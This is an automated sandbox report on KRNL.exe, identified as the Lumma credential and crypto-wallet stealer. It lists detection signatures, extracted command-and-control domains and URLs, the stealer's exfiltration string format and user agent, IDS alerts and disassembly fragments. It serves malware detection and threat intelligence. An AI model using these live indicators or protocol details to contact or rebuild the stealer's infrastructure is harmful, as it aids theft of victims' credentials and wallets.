
Windows Analysis Report
KRNL.exe

Overview

General Information

Sample name: KRNL.exe
Analysis ID: 1583085
MD5: 976a25d2fed5fc7c8700588a33c6826c
SHA1: cce0da8a52a534d6252e716f8476193587e84745
SHA256: a9345000b80b1dd7e5ab5f1491771d39230c83311a1f1b98502f07df453ef02c
Tags: exe, user-Raidr

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to resolve many domain names, but no domain seems valid
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to modify clipboard data
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • KRNL.exe (PID: 1740 cmdline: "C:\Users\user\Desktop\KRNL.exe" MD5: 976A25D2FED5FC7C8700588A33C6826C)
    • conhost.exe (PID: 1136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • KRNL.exe (PID: 2120 cmdline: "C:\Users\user\Desktop\KRNL.exe" MD5: 976A25D2FED5FC7C8700588A33C6826C)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["rebuildeso.buzz", "hummskitnj.buzz", "mindhandru.buzz", "prisonyfork.buzz", "screwamusresz.buzz", "appliacnesot.buzz", "inherineau.buzz", "scentniej.buzz", "cashfuzysao.buzz"], "Build id": "yau6Na--629912535"}
Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security

Source | Rule | Description | Author
00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security
00000002.00000003.1751845531.00000000033CD000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000002.1676084823.00000000043BD000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security
Process Memory Space: KRNL.exe PID: 2120 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
Process Memory Space: KRNL.exe PID: 2120 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
(3 further entries not expanded in this export)

Source | Rule | Description | Author
2.2.KRNL.exe.400000.0.raw.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security
2.2.KRNL.exe.400000.0.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security

No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-01T21:27:59.029778+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49733 | 104.102.49.254 | 443 | TCP
2025-01-01T21:28:00.167445+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49734 | 172.67.157.254 | 443 | TCP
2025-01-01T21:28:01.084272+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49735 | 172.67.157.254 | 443 | TCP
2025-01-01T21:28:02.348216+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49736 | 172.67.157.254 | 443 | TCP
2025-01-01T21:28:03.506865+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49737 | 172.67.157.254 | 443 | TCP
2025-01-01T21:28:04.927121+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49738 | 172.67.157.254 | 443 | TCP
2025-01-01T21:28:06.365717+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49739 | 172.67.157.254 | 443 | TCP
2025-01-01T21:28:08.097129+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49740 | 172.67.157.254 | 443 | TCP
2025-01-01T21:28:13.289406+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49741 | 172.67.157.254 | 443 | TCP
2025-01-01T21:28:00.594397+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49734 | 172.67.157.254 | 443 | TCP
2025-01-01T21:28:01.576540+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49735 | 172.67.157.254 | 443 | TCP
2025-01-01T21:28:13.765451+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49741 | 172.67.157.254 | 443 | TCP
2025-01-01T21:28:00.594397+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49734 | 172.67.157.254 | 443 | TCP
2025-01-01T21:28:01.576540+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.4 | 49735 | 172.67.157.254 | 443 | TCP
2025-01-01T21:27:58.336400+0100 | 2058572 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 65432 | 1.1.1.1 | 53 | UDP
2025-01-01T21:27:58.358476+0100 | 2058576 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 58312 | 1.1.1.1 | 53 | UDP
2025-01-01T21:27:58.370472+0100 | 2058578 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 59352 | 1.1.1.1 | 53 | UDP
2025-01-01T21:27:58.309461+0100 | 2058580 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 56972 | 1.1.1.1 | 53 | UDP
2025-01-01T21:27:58.265380+0100 | 2058582 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 63882 | 1.1.1.1 | 53 | UDP
2025-01-01T21:27:58.277210+0100 | 2058584 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 65221 | 1.1.1.1 | 53 | UDP
2025-01-01T21:27:58.287510+0100 | 2058586 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 59317 | 1.1.1.1 | 53 | UDP
2025-01-01T21:27:58.298392+0100 | 2058588 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 53601 | 1.1.1.1 | 53 | UDP
2025-01-01T21:27:58.319723+0100 | 2058590 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 53017 | 1.1.1.1 | 53 | UDP
2025-01-01T21:28:07.104797+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49739 | 172.67.157.254 | 443 | TCP
2025-01-01T21:27:59.548271+0100 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49733 | 104.102.49.254 | 443 | TCP


                    AV Detection

Source: https://lev-tolstoi.com/k | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/apiul | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/pi# | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/m/S | Avira URL Cloud: Label: malware
Source: 00000000.00000002.1676084823.00000000043BD000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: LummaC {"C2 url": ["rebuildeso.buzz", "hummskitnj.buzz", "mindhandru.buzz", "prisonyfork.buzz", "screwamusresz.buzz", "appliacnesot.buzz", "inherineau.buzz", "scentniej.buzz", "cashfuzysao.buzz"], "Build id": "yau6Na--629912535"}
Source: KRNL.exe | Virustotal: Detection: 40%
Source: KRNL.exe | ReversingLabs: Detection: 68%
Source: KRNL.exe | Joe Sandbox ML: detected
Source: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: hummskitnj.buzz
Source: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: cashfuzysao.buzz
Source: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: appliacnesot.buzz
Source: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: screwamusresz.buzz
Source: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: inherineau.buzz
Source: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: scentniej.buzz
Source: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: rebuildeso.buzz
Source: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: prisonyfork.buzz
Source: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: mindhandru.buzz
Source: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: yau6Na--629912535
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_00414E25 CryptUnprotectData | 2_2_00414E25
Source: KRNL.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 0_2_00701FE9 FindFirstFileExW, FindNextFileW, FindClose, FindClose | 0_2_00701FE9
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_00701F38 FindFirstFileExW | 2_2_00701F38
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_00701FE9 FindFirstFileExW, FindNextFileW, FindClose, FindClose | 2_2_00701FE9
Source: C:\Users\user\Desktop\KRNL.exe | File opened: C:\Users\user\AppData\Local\PlaceholderTileLogoFolder
Source: C:\Users\user\Desktop\KRNL.exe | File opened: C:\Users\user\AppData\Local\Packages
Source: C:\Users\user\Desktop\KRNL.exe | File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\Desktop\KRNL.exe | File opened: C:\Users\user\AppData\Local\Mozilla
Source: C:\Users\user\Desktop\KRNL.exe | File opened: C:\Users\user\AppData\Local\PeerDistRepub
Source: C:\Users\user\Desktop\KRNL.exe | File opened: C:\Users\user\.ms-ad
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], D6EFB4E0h | 2_2_0043F040
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then cmp dword ptr [ebx+edx*8], 17265850h | 2_2_004400C0
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then movzx edx, word ptr [esp+eax*2] | 2_2_0043D0D9
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then lea eax, dword ptr [esi+00003763h] | 2_2_0040C08B
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then movzx ebx, word ptr [esi] | 2_2_0040A8B0
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then movzx esi, word ptr [esp+edx*2+12h] | 2_2_0040C942
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then cmp dword ptr [edx+ecx*8], 9164D103h | 2_2_0043F150
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then mov word ptr [ecx], dx | 2_2_0043D9C1
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then lea edx, dword ptr [eax-00001099h] | 2_2_0043B1D0
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then cmp dword ptr [ebp+esi*8+00h], 56ADC53Ah | 2_2_0043FB10
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 56ADC53Ah | 2_2_0043FB10
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then movzx esi, word ptr [esp+edx*2-00002C30h] | 2_2_0040CC75
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then cmp dword ptr [edi+edx*8], 9AFAF935h | 2_2_004404D0
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then lea ecx, dword ptr [eax+000071B9h] | 2_2_00426520
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then movzx edx, word ptr [ebp+eax*2-00001634h] | 2_2_00423675
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then movzx esi, word ptr [eax] | 2_2_00423675
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then mov byte ptr [edi], cl | 2_2_0042B841
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then mov word ptr [eax], cx | 2_2_0042904E
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then movzx edx, word ptr [ebp+eax*2-00001634h] | 2_2_00424060
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then movzx esi, word ptr [eax] | 2_2_00424060
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then add ecx, edi | 2_2_0042B00F
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then movzx edx, word ptr [esp+esi*2] | 2_2_0043E820
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then movzx eax, word ptr [esp+edi*2] | 2_2_0043E820
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then movzx edx, word ptr [esp+ecx*2+08h] | 2_2_0043E820
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then movzx esi, word ptr [eax+ecx*2] | 2_2_0043E820
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then mov byte ptr [eax], cl | 2_2_004190D1
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 7F7BECC6h | 2_2_0043B8A0
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h | 2_2_00422140
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then lea eax, dword ptr [esi+00003763h] | 2_2_0040C158
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then lea ecx, dword ptr [eax+00000960h] | 2_2_0041C119
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then movzx eax, word ptr [esp+edi*2] | 2_2_0043E920
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then movzx edx, word ptr [esp+ecx*2+08h] | 2_2_0043E920
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then movzx esi, word ptr [eax+ecx*2] | 2_2_0043E920
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h | 2_2_00419930
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then mov eax, dword ptr [ebx+edi+44h] | 2_2_00419930
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then movzx edi, word ptr [esp+eax*2+10h] | 2_2_00419930
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then movzx eax, word ptr [esp+edi*2] | 2_2_0043E9D0
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then movzx edx, word ptr [esp+ecx*2+08h] | 2_2_0043E9D0
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then movzx esi, word ptr [eax+ecx*2] | 2_2_0043E9D0
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then cmp dword ptr [eax+esi*8], 385488F2h | 2_2_004291B1
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then movzx ecx, word ptr [esp+eax*2+28h] | 2_2_00426990
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then cmp dword ptr [eax+esi*8], 385488F2h | 2_2_004291B1
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then movzx edx, word ptr [esp+ebp*2+30h] | 2_2_00429A43
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then cmp word ptr [eax+edi+02h], 0000h | 2_2_00428A4D
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then movzx eax, word ptr [esp+edi*2] | 2_2_0043EA60
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then movzx edx, word ptr [esp+ecx*2+08h] | 2_2_0043EA60
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then movzx esi, word ptr [eax+ecx*2] | 2_2_0043EA60
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then cmp dword ptr [eax+esi*8], 385488F2h | 2_2_00429266
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then mov word ptr [eax], cx | 2_2_00420A20
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then lea edi, dword ptr [edx+00001E1Eh] | 2_2_0040DA8B
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then cmp dword ptr [eax+esi*8], 385488F2h | 2_2_00425A90
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then movzx ecx, word ptr [esi+eax*2+4D3B4CBCh] | 2_2_0040A2A6
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then mov word ptr [ecx], dx | 2_2_0043DB39
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then lea edx, dword ptr [eax+00000960h] | 2_2_0041C3F4
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then movzx edx, word ptr [ebp+eax*2-00001634h] | 2_2_00423C40
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then movzx esi, word ptr [eax] | 2_2_00423C40
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then movzx esi, word ptr [esp+eax*2+04h] | 2_2_0043B450
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then cmp dword ptr [ecx+edi*8], 2DFE5A91h | 2_2_0043F450
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then push eax | 2_2_0043DC5E
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then cmp dword ptr [ecx+ebx*8], 4B1BF3DAh | 2_2_00440400
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h] | 2_2_00407410
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then movzx ecx, word ptr [edi+esi*4] | 2_2_00407410
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then mov dword ptr [edi], 60296828h | 2_2_00424CCD
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then movzx esi, word ptr [ebx+eax*2] | 2_2_00424CCD
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then mov dword ptr [esp+04h], ebx | 2_2_0042B48C
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then lea ecx, dword ptr [eax-000037DBh] | 2_2_00409570
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then mov byte ptr [edi], al | 2_2_0042BD77
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then jmp edi | 2_2_0040A533
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then movzx edx, word ptr [esp+eax*2+06h] | 2_2_004285E1
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then cmp word ptr [eax+edi+02h], 0000h | 2_2_004285E1
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then movzx edx, word ptr [esp+eax*2+0000028Ch] | 2_2_0042D5E6
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then movzx edx, word ptr [esp+eax*2+40h] | 2_2_0043CDF0
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then add eax, 10h | 2_2_004195FD
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then movzx edi, word ptr [ecx] | 2_2_0041BD8F
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then mov byte ptr [edi], bl | 2_2_00408E50
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then cmp dword ptr [edi+edx*8], 9AFAF935h | 2_2_00440650
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then mov word ptr [eax], cx | 2_2_00421E60
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then movzx ebx, byte ptr [edx] | 2_2_00434E60
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then movzx edx, word ptr [esp+ebp*2+30h] | 2_2_00429630
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then mov byte ptr [edi], al | 2_2_0042BE3B
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then movzx edx, word ptr [ebp+eax*2-00001634h] | 2_2_00423EC0
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then movzx esi, word ptr [eax] | 2_2_00423EC0
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then movzx esi, word ptr [esp+edx*2+14h] | 2_2_004386C0
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then mov byte ptr [edi], al | 2_2_0042BE86
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 138629C0h | 2_2_00415E8C
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then mov byte ptr [edi], al | 2_2_0042BE9D
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 8AE4A158h | 2_2_00415F4C
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then movzx ebp, word ptr [esp+ecx*2-7B41DE5Ah] | 2_2_00425770
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then cmp dword ptr [esi+ecx*8], E0A81160h | 2_2_00416777
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then cmp dword ptr [edi+edx*8], AD68FE34h | 2_2_0043FF00
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then add eax, 10h | 2_2_004195FD
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then movzx edx, word ptr [esp+esi*2] | 2_2_0043E710
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then movzx eax, word ptr [esp+edi*2] | 2_2_0043E710
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then movzx edx, word ptr [esp+ecx*2+08h] | 2_2_0043E710
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then movzx esi, word ptr [eax+ecx*2] | 2_2_0043E710
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then mov word ptr [ebx], cx | 2_2_0041B729
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then mov ebx, dword ptr [edi+04h] | 2_2_00429F80
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then cmp dword ptr [edx+ecx*8], E81D91D4h | 2_2_0043F780
Source: C:\Users\user\Desktop\KRNL.exe | Code function: 4x nop then movzx ebx, word ptr [esp+edx*2+28h] | 2_2_004177AD

                    Networking

                    Source: Network trafficSuricata IDS: 2058588 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scentniej .buzz) : 192.168.2.4:53601 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2058584 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (prisonyfork .buzz) : 192.168.2.4:65221 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058586 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebuildeso .buzz) : 192.168.2.4:59317 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058572 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appliacnesot .buzz) : 192.168.2.4:65432 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058576 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cashfuzysao .buzz) : 192.168.2.4:58312 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058580 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (inherineau .buzz) : 192.168.2.4:56972 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058578 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (hummskitnj .buzz) : 192.168.2.4:59352 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058590 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (screwamusresz .buzz) : 192.168.2.4:53017 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058582 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mindhandru .buzz) : 192.168.2.4:63882 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49733 -> 104.102.49.254:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49735 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49735 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49739 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49741 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49734 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49734 -> 172.67.157.254:443
Source: Malware configuration extractor | URLs: rebuildeso.buzz
Source: Malware configuration extractor | URLs: hummskitnj.buzz
